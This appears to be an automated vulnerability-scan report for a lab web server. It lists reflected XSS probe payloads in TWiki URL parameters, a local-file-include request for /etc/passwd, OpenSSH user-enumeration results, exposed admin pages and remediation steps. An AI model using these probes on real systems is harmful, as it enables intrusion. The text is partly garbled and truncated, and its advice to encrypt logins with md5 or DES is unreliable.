http://192.168.105.200/twiki/bin/oops/TWiki/FileAttribute?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/FileAttribute?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >bfdQ(6042)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPreferencesoWuBVEKVgQrg?template=oopsmore¶m1=1.54¶m2=1.54 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPreferencesoWuBVEKVgQrg?template=oopsmore¶m1=1.54¶m2=1.54 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >XrtI(9115)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsmore¶m1=1.33¶m2=1.33 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsmore¶m1=1.33¶m2=1.33 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >pZJp(6331)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >fiZg(7466)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >Cshr(9544)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiPreferencesoWuBVEKVgQrg?rev1=1.54&rev2=1.53 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiPreferencesoWuBVEKVgQrg?rev1=1.54&rev2=1.53 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >oKNc(1521)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >LbjE(6838)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/Main/TWikiAdminGroup?rev2=1.1&rev1=1.20 | Target: http://192.168.105.200/twiki/bin/rdiff/Main/TWikiAdminGroup?rev2=1.1&rev1=1.20 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >VNjr(5537)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRss?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRss?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >Tcmc(3742)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev=1.12 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >vOsR(3419)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/success?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/success?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >IMdT(3879)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsmore¶m1=1.13¶m2=1.13 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsmore¶m1=1.13¶m2=1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >BdYH(6576)</ScRiPt> |
# | Reference |
---|---|
1 | https://www.owasp.org/index.php/Reflected_DOM_Injection |
1. At the point where user input is received, filter as strictly as possible based on what is expected or valid input. 2. At the point where user-controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content. Depending on the output context, this might require applying combinations of HTML, URL,JavaScript, and CSS encoding. 3. To prevent XSS in HTTP responses that aren't intended to contain any HTML or JavaScript, you can use the Content-Type and X-Content-Type-Options headers to ensure that browsers interpret the responses in the way you intend. 4. You can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.
This host is installed with UnrealIRCd and is prone to authentication spoofing vulnerability. Successful exploitation of this vulnerability will allows remote attackers to spoof certificate fingerprints and consequently log in as another user. Impact Level: Application. Successful exploitation of this vulnerability will allows remote attackers to spoof certificate fingerprints and consequently log in as another user. Impact Level: Application.
CVE: [*]
CVSS Score: 6.8
Node(s) | Additional Information |
---|---|
192.168.105.200:6667 | Target: IP: 192.168.105.200 Port: 6667,This host is installed with UnrealIRCd and is prone to authentication spoofing vulnerability. Successful exploitation of this vulnerability will allows remote attackers to spoof certificate fingerprints and consequently log in as another user. Impact Level: Application. Successful exploitation of this vulnerability will allows remote attackers to spoof certificate fingerprints and consequently log in as another user. Impact Level: Application. |
# | Reference |
---|---|
1 | :http://seclists.org/oss-sec/2016/q3/420, |
2 | :http://www.openwall.com/lists/oss-security/2016/09/05/8, |
3 | :https://github.com/unrealircd/unrealircd/commit/f473e355e1dc422c4f019dbf86bc50ba1a34a766 |
Upgrade to UnrealIRCd 3.2.10.7, or 4.0.6, or later. For updates refer to https://bugs.unrealircd.org/main_page.php
Successfully exploiting this issue may allow attackers to obtainsensitive information by conducting a man-in-the-middle attack. Thismay lead to other attacks. OpenSSL is prone to security-bypass vulnerability. Successfully exploiting this issue may allow attackers to obtainsensitive information by conducting a man-in-the-middle attack. Thismay lead to other attacks.
CVE: [*]
CVSS Score: 6.8
Node(s) | Additional Information |
---|---|
192.168.105.200:5432 | Target: IP: 192.168.105.200 Port: 5432,Successfully exploiting this issue may allow attackers to obtainsensitive information by conducting a man-in-the-middle attack. Thismay lead to other attacks. OpenSSL is prone to security-bypass vulnerability. Successfully exploiting this issue may allow attackers to obtainsensitive information by conducting a man-in-the-middle attack. Thismay lead to other attacks. |
# | Reference |
---|---|
1 | :http://www.securityfocus.com/bid/67899, |
2 | :http://openssl.org/ |
Updates are available.
Leakage Background Logon Entry
CVE: [*]
CVSS Score: 6.6
Node(s) | Additional Information |
---|---|
http://192.168.105.200/phpMyAdmin/index.php?lang=en-utf-8&convcharset=utf-8&token=e4dee536a37db094620f4815536a085f | Target: http://192.168.105.200/phpMyAdmin/index.php?lang=en-utf-8&convcharset=utf-8&token=e4dee536a37db094620f4815536a085f has a background address leak vulnerability; check the background entry of the target application. Administrator applications are generally used for background management of websites, with full authority. These applications may contain sensitive information or have low security protection. An attacker can obtain sensitive information through this file or enter the background of a website for malicious operations.。 |
http://192.168.105.200/phpMyAdmin/ChangeLog | Target: http://192.168.105.200/phpMyAdmin/ChangeLog has a background address leak vulnerability; check the background entry of the target application. Administrator applications are generally used for background management of websites, with full authority. These applications may contain sensitive information or have low security protection. An attacker can obtain sensitive information through this file or enter the background of a website for malicious operations.。 |
http://192.168.105.200/phpMyAdmin/index.php?token=3fe9a890c05f09edeb1cbf73cb091acd | Target: http://192.168.105.200/phpMyAdmin/index.php?token=3fe9a890c05f09edeb1cbf73cb091acd has a background address leak vulnerability; check the background entry of the target application. Administrator applications are generally used for background management of websites, with full authority. These applications may contain sensitive information or have low security protection. An attacker can obtain sensitive information through this file or enter the background of a website for malicious operations.。 |
http://192.168.105.200/phpMyAdmin/index.php | Target: http://192.168.105.200/phpMyAdmin/index.php has a background address leak vulnerability; check the background entry of the target application. Administrator applications are generally used for background management of websites, with full authority. These applications may contain sensitive information or have low security protection. An attacker can obtain sensitive information through this file or enter the background of a website for malicious operations.。 |
http://192.168.105.200/phpMyAdmin/index.php?db=redefine+viral+convergence&table=Minnesota&token=3fe9a890c05f09edeb1cbf73cb091acd | Target: http://192.168.105.200/phpMyAdmin/index.php?db=redefine+viral+convergence&table=Minnesota&token=3fe9a890c05f09edeb1cbf73cb091acd has a background address leak vulnerability; check the background entry of the target application. Administrator applications are generally used for background management of websites, with full authority. These applications may contain sensitive information or have low security protection. An attacker can obtain sensitive information through this file or enter the background of a website for malicious operations.。 |
http://192.168.105.200/phpMyAdmin/ | Target: http://192.168.105.200/phpMyAdmin/ has a background address leak vulnerability; check the background entry of the target application. Administrator applications are generally used for background management of websites, with full authority. These applications may contain sensitive information or have low security protection. An attacker can obtain sensitive information through this file or enter the background of a website for malicious operations.。 |
http://192.168.105.200/phpMyAdmin/index.php?pma_username=1&pma_password=1&server=1&lang=en-utf-8&convcharset=utf-8&token=e4dee536a37db094620f4815536a085f&method=post | Target: http://192.168.105.200/phpMyAdmin/index.php?pma_username=1&pma_password=1&server=1&lang=en-utf-8&convcharset=utf-8&token=e4dee536a37db094620f4815536a085f&method=post has a background address leak vulnerability; check the background entry of the target application. Administrator applications are generally used for background management of websites, with full authority. These applications may contain sensitive information or have low security protection. An attacker can obtain sensitive information through this file or enter the background of a website for malicious operations.。 |
http://192.168.105.200/phpMyAdmin/index.php?db=1&table=1&lang=en-utf-8&convcharset=utf-8&token=e4dee536a37db094620f4815536a085f&method=post | Target: http://192.168.105.200/phpMyAdmin/index.php?db=1&table=1&lang=en-utf-8&convcharset=utf-8&token=e4dee536a37db094620f4815536a085f&method=post has a background address leak vulnerability; check the background entry of the target application. Administrator applications are generally used for background management of websites, with full authority. These applications may contain sensitive information or have low security protection. An attacker can obtain sensitive information through this file or enter the background of a website for malicious operations.。 |
http://192.168.105.200/phpMyAdmin/index.php?c=index | Target: http://192.168.105.200/phpMyAdmin/index.php?c=index has a background address leak vulnerability; check the background entry of the target application. Administrator applications are generally used for background management of websites, with full authority. These applications may contain sensitive information or have low security protection. An attacker can obtain sensitive information through this file or enter the background of a website for malicious operations.。 |
# | Reference |
---|---|
N/A |
1、Enhancing authentication and security of access to such documents。 2、If you do not need such a file, delete it。 3、Modified to unpredictable file names。
Based on the files accessible via this anonymous FTP login and the permissions of this account an attacker might be able to: - gain access to sensitive files - upload or delete files This FTP Server allows anonymous logins.
CVE: [*]
CVSS Score: 6.4
Node(s) | Additional Information |
---|---|
192.168.105.200:21 | Target: IP: 192.168.105.200 Port: 21,Based on the files accessible via this anonymous FTP login and the permissions of this account an attacker might be able to: - gain access to sensitive files - upload or delete files This FTP Server allows anonymous logins. |
# | Reference |
---|---|
1 | :https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0497 |
If you do not want to share files, you should disable anonymous logins.
Samba is prone to a vulnerability that allows attackers to execute arbitrary shell commands because the software fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary shell commands on an affected system with the privileges of the application. An attacker may leverage this issue to execute arbitrary shell commands on an affected system with the privileges of the application.
CVE: [*]
CVSS Score: 6.0
Node(s) | Additional Information |
---|---|
192.168.105.200:445 | Target: IP: 192.168.105.200 Port: 445,Samba is prone to a vulnerability that allows attackers to execute arbitrary shell commands because the software fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary shell commands on an affected system with the privileges of the application. An attacker may leverage this issue to execute arbitrary shell commands on an affected system with the privileges of the application. |
# | Reference |
---|---|
1 | :http://www.securityfocus.com/bid/23972, |
2 | :https://www.samba.org/samba/security/CVE-2007-2447.html |
Updates are available. Please see the referenced vendor advisory.
Debugging functions are enabled on the remote HTTP server.The remote webserver supports the TRACE and/or TRACK methods. TRACE and TRACKare HTTP methods which are used to debug web server connections. It has been shown that servers supporting this method are subject tocross-site-scripting attacks, dubbed XST for Cross-Site-Tracing, whenused in conjunction with various weaknesses in browsers. An attacker may use this flaw to trick your legitimate web users to givehim their credentials.
CVE: [*]
CVSS Score: 5.8
Node(s) | Additional Information |
---|---|
http://192.168.105.200 | Target: http://192.168.105.200,Debugging functions are enabled on the remote HTTP server.The remote webserver supports the TRACE and/or TRACK methods. TRACE and TRACKare HTTP methods which are used to debug web server connections. It has been shown that servers supporting this method are subject tocross-site-scripting attacks, dubbed XST for Cross-Site-Tracing, whenused in conjunction with various weaknesses in browsers. An attacker may use this flaw to trick your legitimate web users to givehim their credentials. |
# | Reference |
---|---|
1 | :http://www.kb.cert.org/vuls/id/867593 |
Disable these methods.
Leak sensitive information
CVE: [*]
CVSS Score: 5.3
Node(s) | Additional Information |
---|---|
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.phpDATA | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.phpDATA Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.jspx | Target: http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.jspx Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.jsp | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.jsp Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.aspx | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.aspx Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.jspx | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.jspx Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/mutillidae/index.php?page=add-to-your-blog.php | Target: http://192.168.105.200/mutillidae/index.php?page=add-to-your-blog.php There is an exception information leaking from web services. With this information, an attacker can further invade the server。 |
http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.htaccess | Target: http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.htaccess Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.htaccess | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.htaccess Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqKjsp | Target: http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqKjsp Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/mutillidae/index.php?page=captured-data.php | Target: http://192.168.105.200/mutillidae/index.php?page=captured-data.php There is an exception information leaking from web services. With this information, an attacker can further invade the server。 |
http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.jsp | Target: http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.jsp Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.phpDATA | Target: http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.phpDATA Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.asp | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.asp Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.htaccess | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.htaccess Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZPjsp | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZPjsp Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphDjsp | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphDjsp Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.aspx | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.aspx Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/mutillidae/phpinfo.php | Target: http://192.168.105.200/mutillidae/phpinfo.php Leakage PHP file exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.jsp | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.jsp Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/phpinfo.php | Target: http://192.168.105.200/phpinfo.php Leakage PHP file exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.aspx | Target: http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.aspx Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.asp | Target: http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.asp Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.jspx | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.jspx Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.phpDATA | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.phpDATA Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.asp | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.asp Leakage source exists. With this information, an attacker can further invade the server. |
# | Reference |
---|---|
N/A |
1. It is recommended that you delete useless programs such as probes or create hard-to-crack names for them. 2. Disable pages or applications that leak sensitive information.
Before OpenSSH 7.7, there was a user name enumeration vulnerability through which an attacker could determine whether a user name existed in the target host.
CVE: [*]
CVSS Score: 5.3
Node(s) | Additional Information |
---|---|
192.168.105.200:22 | Target: 192.168.105.200: 22, there is an openssh user enumeration vulnerability (CVE-2018-15473). The user that exists in the test is root nobody mysql bin mail |
# | Reference |
---|---|
1 | http://openwall.com/lists/oss-security/2018/08/15/5 |
Upgrade OpenSSH version to greater than 7.7 version.
Catalog Information Leakage
CVE: [*]
CVSS Score: 5.3
Node(s) | Additional Information |
---|---|
http://192.168.105.200/dav/ | Target: http://192.168.105.200/dav/ There is a directory information leak vulnerability;Information leakage refers to the leakage of sensitive catalog information in web pages or applications. With this information, an attacker can further invade the server。 |
http://192.168.105.200/mutillidae/javascript/ddsmoothmenu/ | Target: http://192.168.105.200/mutillidae/javascript/ddsmoothmenu/ There is a directory information leak vulnerability;Information leakage refers to the leakage of sensitive catalog information in web pages or applications. With this information, an attacker can further invade the server。 |
http://192.168.105.200/dvwa/config | Target: http://192.168.105.200/dvwa/config There is a directory information leak vulnerability;Information leakage refers to the leakage of sensitive catalog information in web pages or applications. With this information, an attacker can further invade the server。 |
http://192.168.105.200/mutillidae/javascript/ | Target: http://192.168.105.200/mutillidae/javascript/ There is a directory information leak vulnerability;Information leakage refers to the leakage of sensitive catalog information in web pages or applications. With this information, an attacker can further invade the server。 |
# | Reference |
---|---|
N/A |
1、It is recommended that you delete useless programs such as probes or create hard-to-crack names for them.。 2、Disable pages or applications that leak sensitive information。
The data is not encrypted at the time of login, which leads to the leakage of user password if the traffic is hijacked by malicious users in the HTTP protocol in the form of plaintext during transmission.
CVE: [*]
CVSS Score: 5.3
Node(s) | Additional Information |
---|---|
http://192.168.105.200/dvwa/login.php | Target: http://192.168.105.200/dvwa/login.php, HTTP account password plaintext transmission vulnerability |
# | Reference |
---|---|
N/A |
1. Using encryption algorithm to encrypt in transmission process (example: md5, DES, etc)
This routine search for weak SSL ciphers offered by a service.
CVE: [*]
CVSS Score: 5.0
Node(s) | Additional Information |
---|---|
192.168.105.200:5432 | Target: IP: 192.168.105.200 Port: 5432,This routine search for weak SSL ciphers offered by a service. |
# | Reference |
---|---|
1 | :https://www.bsi.bund.de/SharedDocs/Warnmeldungen/DE/CB/warnmeldung_cb-k16-1465_update_6.html, |
2 | :https://bettercrypto.org/ |
The configuration of this services should be changed so that it does not support the listed weak ciphers anymore.
The remote server's SSL certificate has already expired.
CVE: [*]
CVSS Score: 5.0
Node(s) | Additional Information |
---|---|
192.168.105.200:5432 | Target: IP: 192.168.105.200 Port: 5432,The remote server's SSL certificate has already expired. |
# | Reference |
---|---|
N/A |
Replace the SSL certificate by a new one.
The /doc directory is browsable. /doc shows the content of the /usr/doc directory and therefore it shows which programs and - important! - the version of the installed programs.
CVE: [*]
CVSS Score: 5.0
Node(s) | Additional Information |
---|---|
http://192.168.105.200/doc/ | Target: http://192.168.105.200/doc/,The /doc directory is browsable. /doc shows the content of the /usr/doc directory and therefore it shows which programs and - important! - the version of the installed programs. |
# | Reference |
---|---|
N/A |
Use access restrictions for the /doc directory. If you use Apache you might use this in your access.conf: <Directory /usr/doc> AllowOverride None order deny,allow deny from all allow from localhost </Directory>
awiki is prone to multiple local file-include vulnerabilities becauseit fails to properly sanitize user-supplied input.An attacker can exploit this vulnerability to obtain potentiallysensitive information and execute arbitrary local scripts in thecontext of the webserver process. This may allow the attacker tocompromise the application and the computer; other attacks arealso possible.awiki 20100125 is vulnerable; other versions may also be affected.
CVE: [*]
CVSS Score: 5.0
Node(s) | Additional Information |
---|---|
http://192.168.105.200/mutillidae/index.php?page=/etc/passwd | Target: http://192.168.105.200/mutillidae/index.php?page=/etc/passwd,awiki is prone to multiple local file-include vulnerabilities becauseit fails to properly sanitize user-supplied input.An attacker can exploit this vulnerability to obtain potentiallysensitive information and execute arbitrary local scripts in thecontext of the webserver process. This may allow the attacker tocompromise the application and the computer; other attacks arealso possible.awiki 20100125 is vulnerable; other versions may also be affected. |
# | Reference |
---|---|
1 | :http://www.securityfocus.com/bid/49187, |
2 | :http://www.kobaonline.com/awiki/ |
The host / application transmits sensitive information (username, passwords) in cleartext via HTTP. An attacker could use this situation to compromise or eavesdrop on the HTTP communication between the client and the server using a man-in-the-middle attack to get access to sensitive data like usernames or passwords. Hosts / applications which doesn't enforce the transmission of sensitive data via an encrypted SSL/TLS connection. affected:
CVE: [*]
CVSS Score: 4.8
Node(s) | Additional Information |
---|---|
http://192.168.105.200/tikiwiki/tiki-install.php:pass | Target: http://192.168.105.200/tikiwiki/tiki-install.php:pass,The host / application transmits sensitive information (username, passwords) in cleartext via HTTP. An attacker could use this situation to compromise or eavesdrop on the HTTP communication between the client and the server using a man-in-the-middle attack to get access to sensitive data like usernames or passwords. Hosts / applications which doesn't enforce the transmission of sensitive data via an encrypted SSL/TLS connection. affected: |
http://192.168.105.200/phpMyAdmin/:pma_password | Target: http://192.168.105.200/phpMyAdmin/:pma_password,The host / application transmits sensitive information (username, passwords) in cleartext via HTTP. An attacker could use this situation to compromise or eavesdrop on the HTTP communication between the client and the server using a man-in-the-middle attack to get access to sensitive data like usernames or passwords. Hosts / applications which doesn't enforce the transmission of sensitive data via an encrypted SSL/TLS connection. affected: |
http://192.168.105.200/phpMyAdmin/?D=A:pma_password | Target: http://192.168.105.200/phpMyAdmin/?D=A:pma_password,The host / application transmits sensitive information (username, passwords) in cleartext via HTTP. An attacker could use this situation to compromise or eavesdrop on the HTTP communication between the client and the server using a man-in-the-middle attack to get access to sensitive data like usernames or passwords. Hosts / applications which doesn't enforce the transmission of sensitive data via an encrypted SSL/TLS connection. affected: |
# | Reference |
---|---|
1 | :https://www.owasp.org/index.php/Top_10_2013-A2-Broken_Authentication_and_Session_Management, |
2 | :https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure, |
3 | :https://cwe.mitre.org/data/definitions/319.html |
Enforce the transmission of sensitive data via an encrypted SSL/TLS connection. Additionally make sure the host / application is redirecting all users to the secured SSL/TLS connection before allowing to input sensitive data into the mentioned functions.
URL jump (redirection) is usually implemented in several ways: meta tag jump, JavaScript jump, header jump. However, in either way, if the server does not check the incoming jump URL variables effectively, the attacker can use this vulnerability to construct any malicious address, induce the victim user to jump to malicious websites, and then launch Trojan horse, fishing and other attacks. In addition, the use of URL jump vulnerabilities can also break through some common security restrictions based on whitelist, such as traditional IM for URL transmission security checks, but for large companies, domain names and URLs will be directly allowed to pass and display trusted urls, and once the URL contains some jump vulnerabilities, security restrictions may be bypassed.
CVE: [*]
CVSS Score: 4.3
# | Reference |
---|---|
N/A |
1. If the jump URL can be determined beforehand, including the value of URL and parameters, it can be configured in the background. The URL parameters can be found by passing the index of the corresponding url.Jump over the specific URL again; 2. If the jump URL is not known beforehand, but the input is generated by the background (not by the user passing on parameters), then you can sign the jump link and jump cgThe first step is to verify the signature in order to make the jump; 3. If both 1 and 2 are not satisfied, the URL cannot be determined beforehand and can only be passed in through the front-end parameters, then the URL must be checked according to the rules at the time of the jump: that is, whether the control URL is authorizedwhitelist or regular url; 4. In essence, URL jump vulnerability is a special case of CSRF vulnerability, so it can be verified by adding token, by adding uncontrollable token pairs to the generated links.The generated links can be checked to avoid users from generating thei
The remote SSH server is configured to allow weak encryption algorithms.
CVE: [*]
CVSS Score: 4.3
Node(s) | Additional Information |
---|---|
192.168.105.200:22 | Target: IP: 192.168.105.200 Port: 22,The remote SSH server is configured to allow weak encryption algorithms. |
# | Reference |
---|---|
1 | :https://tools.ietf.org/html/rfc4253#section-6.3, |
2 | :https://www.kb.cert.org/vuls/id/958563 |
Disable the weak encryption algorithms.
CSRF (Cross-site Request Forgery) cross site request forgery, also known as "One Click Attack" or Session Riding, is usually abbreviated as CSRF or XSRF, which is a malicious use of websites. Although it sounds like cross-site scripting (XSS), it is very different from XSS, which uses trusted users within the site, while CSRF uses trusted sites by disguising requests from trusted users. Compared with XSS attacks, CSRF attacks are often less prevalent (and therefore relatively scarce resources to guard against) and difficult to guard against, so they are considered to be more dangerous than XSS attacks.
CVE: [*]
CVSS Score: 4.3
Node(s) | Additional Information |
---|---|
http://192.168.105.200/twiki/bin/edit/Main/WIKILOGOIMG | Target:http://192.168.105.200/twiki/bin/edit/Main/WIKILOGOIMG |
http://192.168.105.200/twiki/bin/edit/Sandbox/WebHome?t=1595894673 | Target:http://192.168.105.200/twiki/bin/edit/Sandbox/WebHome?t=1595894673 |
http://192.168.105.200/twiki/bin/edit/TWiki/TextFormattingRules | Target:http://192.168.105.200/twiki/bin/edit/TWiki/TextFormattingRules |
http://192.168.105.200/twiki/bin/edit/TWiki/WebRssBasepqdJdCubYLBE | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebRssBasepqdJdCubYLBE |
http://192.168.105.200/twiki/bin/edit/TWiki/WebHome?t=1595894679 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebHome?t=1595894679 |
http://192.168.105.200/twiki/bin/edit/TWiki/WIKILOGOIMG | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WIKILOGOIMG |
http://192.168.105.200/twiki/bin/edit/TWiki/WebRssgFJiGmbjzLvK | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebRssgFJiGmbjzLvK |
http://192.168.105.200/twiki/bin/edit/TWiki/GoodStyle | Target:http://192.168.105.200/twiki/bin/edit/TWiki/GoodStyle |
http://192.168.105.200/twiki/bin/edit/TWiki/success?t=1595894956 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/success?t=1595894956 |
